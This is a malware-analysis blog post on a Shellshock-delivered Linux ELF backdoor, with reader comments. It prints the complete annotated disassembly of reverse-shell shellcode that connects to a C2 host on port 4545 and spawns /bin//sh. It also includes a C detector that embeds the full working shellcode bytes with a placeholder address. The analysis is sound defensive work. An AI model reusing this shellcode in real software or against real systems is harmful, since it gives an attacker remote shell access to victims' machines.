Friday, September 26, 2014

MMD-0027-2014 - Linux ELF bash 0day (shellshock): The fun has only just begun.. (Part 1)

Background: CVE-2014-6271 + CVE-2014-7169

During the mayhem of the bash remote code execution 0day CVE-2014-6271 and CVE-2014-7169, not to brag but as an FYI, I happened to be the first to reverse the first ELF malware spotted being used in the wild. The rough disassembly analysis and summary I wrote and posted in VirusTotal and Kernel Mode are here --> [-1-] [-2-] < thanks to Yinettesys (credit): the credit is all hers for the links to find this malware, for the swift sensoring and alert, and for the analysis request; we would not have been aware of this so fast without her.

The fun has only just begun...

Yes. Today I was informed that another payload is being distributed, thanks to my good friend:

Which leads to this malicious ELF file served online:

Do the pure reversing..

This ELF "malware" works differently: it connects back to a remote host on a fixed port and, once connected, redirects stdin/stdout/stderr to the socket and spawns the shell "/bin//sh". Yes, a remote shell backdoor. It is coded in assembly as raw shellcode that drives the Linux kernel's system calls directly through int 0x80.
For your convenience I wrote my decoding scratch notes as comments on the disassembly of all the malware bits below, so everyone can see how it works:

0x08048054    31db         xor ebx, ebx        // ebx = 0
0x08048056    f7e3         mul ebx             // eax = edx = 0 (edx stays 0 and is reused later as NULL)
0x08048058    53           push ebx            // protocol = 0
0x08048059    43           inc ebx             // ebx = 1 = SYS_SOCKET (socketcall subcode)
0x0804805a    53           push ebx            // type = SOCK_STREAM (1); args are pushed in reverse order
0x0804805b    6a02         push 0x2            // domain = AF_INET (2)
0x0804805d    89e1         mov ecx, esp        // ecx -> {AF_INET, SOCK_STREAM, 0}
0x0804805f    b066         mov al, 0x66        // eax = 102 = socketcall
0x08048061    cd80         int 0x80            // socket(AF_INET, SOCK_STREAM, 0) -> eax = sockfd
0x08048063    93           xchg ebx, eax       // ebx = sockfd
0x08048064    59           pop ecx             // ecx = 2 (the AF_INET value left on the stack, reused as a counter)
0x08048065    b03f         mov al, 0x3f        // eax = 63 = dup2 (not connect)
0x08048067    cd80         int 0x80            // dup2(sockfd, ecx)
0x08048069    49           dec ecx             // ecx: 2 -> 1 -> 0 -> -1
0x0804806a    79f9         jns 0x08048065      // loop while ecx >= 0: stderr, stdout, stdin all point at the socket
0x0804806c    681b139fe0   push 0xe09f131b     // sin_addr: the C2 IP, four octets as they sit in memory (1b 13 9f e0)
0x08048071    68020011c1   push 0xc1110002     // sin_family = AF_INET (0x0002), sin_port = 0x11c1 = htons(4545)
0x08048076    89e1         mov ecx, esp        // ecx -> struct sockaddr_in
0x08048078    b066         mov al, 0x66        // eax = 102 = socketcall
0x0804807a    50           push eax            // addrlen = 102 (oversized, but >= sizeof(sockaddr_in) so the kernel accepts it)
0x0804807b    51           push ecx            // &sockaddr_in
0x0804807c    53           push ebx            // sockfd
0x0804807d    b303         mov bl, 0x3         // ebx = 3 = SYS_CONNECT
0x0804807f    89e1         mov ecx, esp        // ecx -> {sockfd, &sockaddr_in, addrlen}
0x08048081    cd80         int 0x80            // connect(sockfd, &sockaddr_in, 102)
0x08048083    52           push edx            // NULL terminator for the string (edx is still 0)
0x08048084    682f2f7368   push 0x68732f2f     // "//sh"
0x08048089    682f62696e   push 0x6e69622f     // "/bin" -> "/bin//sh\0" now sits on the stack
0x0804808e    89e3         mov ebx, esp        // ebx -> "/bin//sh"
0x08048090    52           push edx            // argv terminator (NULL)
0x08048091    53           push ebx            // argv[0] = "/bin//sh"
0x08048092    89e1         mov ecx, esp        // ecx -> argv; edx (0) doubles as envp = NULL
0x08048094    b00b         mov al, 0xb         // eax = 11 = execve (only AL is set, so this relies on connect() having left eax = 0)
0x08048096    cd80         int 0x80            // execve("/bin//sh", ["/bin//sh", NULL], NULL)
↑ So this back-connects to the C2 IP on TCP port 4545, wires stdin/stdout/stderr of the infected host to that socket, and then spawns "/bin//sh": a plain reverse shell. I think I saw this shellcode being used a lot around 2011 or 2012.
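To turn the reading above into something repeatable, here is an added example (my own code, not from the original post or the sample): a static fingerprinter for this shell_reverse_tcp-style shellcode. It scans a byte buffer for the "push sin_addr; push sin_family|sin_port; mov ecx, esp; mov al, 0x66" sequence and for the "push '//sh'; push '/bin'" pair, and decodes the C2 endpoint without ever running the binary. The embedded sample is constructed from the opcode column of the listing; the sin_addr immediate is replaced by the documentation address 192.0.2.1 (an assumed placeholder, not the real C2), the port immediate 0x11c1 is kept.

```c
/*
 * Static fingerprinter for x86 socketcall-based reverse-shell shellcode.
 * Added example; the byte pattern comes from the disassembly above.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct c2_info {
    int      found_sockaddr;  /* 1 if the sockaddr_in push pair was found */
    int      found_binsh;     /* 1 if the "/bin//sh" push pair was found */
    uint16_t family;          /* sin_family as stored (host order) */
    uint16_t port;            /* sin_port converted from network order */
    char     ip[16];          /* dotted-quad sin_addr */
    size_t   sockaddr_off;    /* offset of "push sin_addr" in the buffer */
};

/* little-endian imm32 that follows a 0x68 "push imm32" opcode */
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Returns 1 when both the C2 sockaddr and the /bin//sh string are present. */
int fingerprint_reverse_tcp(const uint8_t *buf, size_t len, struct c2_info *out)
{
    memset(out, 0, sizeof *out);

    /* pattern A: 68 aa aa aa aa 68 02 00 pp pp 89 e1 b0 66 (14 bytes)
     * push sin_addr ; push {AF_INET, port} ; mov ecx,esp ; mov al,0x66 */
    for (size_t i = 0; i + 14 <= len; i++) {
        const uint8_t *p = buf + i;
        if (p[0] == 0x68 && p[5] == 0x68 && p[6] == 0x02 && p[7] == 0x00 &&
            p[10] == 0x89 && p[11] == 0xe1 && p[12] == 0xb0 && p[13] == 0x66) {
            uint32_t addr = rd32(p + 1);  /* octets land in memory as a.b.c.d */
            out->found_sockaddr = 1;
            out->sockaddr_off = i;
            out->family = (uint16_t)(p[6] | (p[7] << 8));
            out->port = (uint16_t)((p[8] << 8) | p[9]);  /* network -> host order */
            snprintf(out->ip, sizeof out->ip, "%u.%u.%u.%u",
                     (unsigned)(addr & 0xff), (unsigned)((addr >> 8) & 0xff),
                     (unsigned)((addr >> 16) & 0xff), (unsigned)(addr >> 24));
            break;
        }
    }

    /* pattern B: push 0x68732f2f ("//sh") ; push 0x6e69622f ("/bin") */
    static const uint8_t binsh[] = { 0x68, 0x2f, 0x2f, 0x73, 0x68,
                                     0x68, 0x2f, 0x62, 0x69, 0x6e };
    for (size_t i = 0; i + sizeof binsh <= len; i++) {
        if (memcmp(buf + i, binsh, sizeof binsh) == 0) {
            out->found_binsh = 1;
            break;
        }
    }
    return out->found_sockaddr && out->found_binsh;
}

/* Constructed sample: the opcode bytes of the listing above, with the
 * sin_addr immediate replaced by 192.0.2.1 (placeholder, not the real C2). */
static const uint8_t SAMPLE[] = {
    0x31, 0xdb, 0xf7, 0xe3, 0x53, 0x43, 0x53, 0x6a, 0x02, 0x89, 0xe1, 0xb0,
    0x66, 0xcd, 0x80, 0x93, 0x59, 0xb0, 0x3f, 0xcd, 0x80, 0x49, 0x79, 0xf9,
    0x68, 0xc0, 0x00, 0x02, 0x01,        /* push sin_addr (192.0.2.1, placeholder) */
    0x68, 0x02, 0x00, 0x11, 0xc1,        /* push AF_INET | htons(4545) */
    0x89, 0xe1, 0xb0, 0x66, 0x50, 0x51, 0x53, 0xb3, 0x03, 0x89, 0xe1, 0xcd,
    0x80, 0x52, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69, 0x6e,
    0x89, 0xe3, 0x52, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80
};

const uint8_t *sample_bytes(void) { return SAMPLE; }
size_t sample_len(void) { return sizeof SAMPLE; }

int main(void)
{
    struct c2_info info;
    int hit = fingerprint_reverse_tcp(SAMPLE, sizeof SAMPLE, &info);
    printf("reverse_tcp shellcode: %s\n", hit ? "yes" : "no");
    if (info.found_sockaddr)
        printf("  C2 %s:%u (sin_family=%u) at offset %zu\n",
               info.ip, (unsigned)info.port, (unsigned)info.family, info.sockaddr_off);
    if (info.found_binsh)
        printf("  spawns /bin//sh\n");
    return hit ? 0 : 1;
}
```

Run it over the raw bytes of the .text section (or over the whole file: the pattern is position independent) and it reports the endpoint the sample will call home to. The sockaddr match is deliberately tied to the "mov ecx, esp; mov al, 0x66" tail so that random 0x68 bytes do not trigger it; a variant that builds the struct differently will need its own pattern.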

Just in case you want to see how I reversed it (guess what tool it is? *smile):

Confirming reverse engineering:

dup2(3, 2)                              = 2
dup2(3, 1)                              = 1
dup2(3, 0)                              = 0
connect(3, {sa_family=AF_INET, sin_port=htons(4545), sin_addr=inet_addr("")
The trace matches the disassembly: the three dup2() calls point stderr, stdout and stdin at the socket (fd 3), and then connect() goes out to port 4545. It is self-explanatory.

Reversing is confirmed. Next step is... let's bang on their door! :-))

fu4k   12467   mmd    0u     IPv4       243888042   0t0    TCP> (SYN_SENT)
fu4k   12467   mmd    1u     IPv4       243888042   0t0    TCP> (SYN_SENT)
fu4k   12467   mmd    2u     IPv4       243888042   0t0    TCP> (SYN_SENT)
fu4k   12467   mmd    3u     unix 0xffff88018aad94c0   0t0 243884464 socket
fu4k   12467   mmd    4u     unix 0xffff88018aad8e40   0t0 243884465 socket
fu4k   12467   mmd    5u     unix 0xffff88018aad8e40   0t0 243884465 socket
fu4k   12467   mmd    6r     FIFO          0,8   0t0 243884466 pipe
fu4k   12467   mmd    7w     FIFO          0,8   0t0 243884466 pipe
fu4k   12467   mmd    8u     IPv4       243888042   0t0    TCP> (SYN_SENT)
Note that fd 0, 1, 2 and 8 all refer to the same TCP socket (inode 243888042): that is the dup2() loop at work. But it looks like they don't want to play my "knock knock" game: every connection stays in SYN_SENT, so the C2 host is not answering on port 4545.. :-(( #bummer

This is the CNC IP source:

IP: ""
ASN: "4134"
CIDR: ""
Country: "CN"

Detection ratio

As always with newly found ELF malware, AV detection is ZERO (FUD / fully undetected):

Sample is (always) shared

I am sharing the sample in Kernel Mode, under a newly registered ELF malware repository name, "Linux/binsh" < since it uses "/bin//sh" as the shell hard coded in its shellcode -->[LINK]


So we have "another" crook starting to play with ELF hacks on shellshock, for spying purposes too :-)

Thank you

Thank you to the IT media article that directly mentioned and linked to us:

Thank you to the IT media article that mentioned our work:

Thank you for the blog and comment links:

Stay safe..there will be more of these.. #MalwareMustDie!


  1. Some of you may think this is a mere reverse shell (shell_reverse_tcp) attack, produced automatically by msfpayload. The msfpayload shell_reverse_tcp shellcode (I didn't analyze that) may be the same in assembly as this, but that's NOT the issue here.
    This is the ELF binary "compiled" with that shellcode logic inside, infected via the shellshock exploit to be saved and executed in /tmp of the vulnerable host < backdoor malware to me, as an ELF malware specialist.

  2. I'm trying to disassemble this file. Can you please tell me which debugger will let me dump the object file in Linux? I'm not able to dump it using objdump. In the edb debugger I can see the assembly code but can't dump it.

    1. Could you be more specific in your statement "Not able to dump using objdump"? objdump can, as long as you feed the right binary to the right architecture installed with it.

  3. Hello, on my Apache web server I have identified a DDoS attempt; there are several packets from the httpd service to
    through port 6667. My knowledge of Linux is limited, and after reading these articles I still cannot find a point from which to start the correction process. Can you tell me the right steps? Thank you.

    1. It seems like your web server was breached by the IRC Perl bot or IRC PHP bot; they connect from the IRC service to execute commands on your breached Linux shell to do malicious activity.

      Steps are:
      1. Check the files served by your web server; there must be things there that are not supposed to be there. Remove them.
      2. Upgrade your web server's packages, and your Linux/UNIX packages too, to the latest version; it REALLY helps prevent things like this from happening again.
      3. If you find something unusual, please make sure you get to the bottom of the source that is causing it; don't stop until you have an explanation. Feel free to contact me at @malwaremustdie (Twitter) for any questions; I may be able to help you with several problems.

  4. When you analyzed this file, what kind of tools did you use?

    1. I use what Unix software provides me. Nothing more or fancy.